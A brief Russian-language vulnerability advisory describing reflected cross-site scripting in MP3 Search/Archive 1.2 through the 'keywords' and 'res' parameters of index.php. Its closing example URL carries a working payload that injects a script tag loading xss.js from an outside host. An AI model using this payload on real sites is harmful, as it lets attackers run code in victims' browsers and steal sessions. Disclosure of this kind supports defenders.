Программа: MP3 Search/Archive 1.2, возможно более ранние версии.
Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "keywords" и "res" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://www.example.com/search/index.php?letter=O&p=2&res=92">">">">'>'> <"">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js> </SCRIPT><"<"<"<'<'
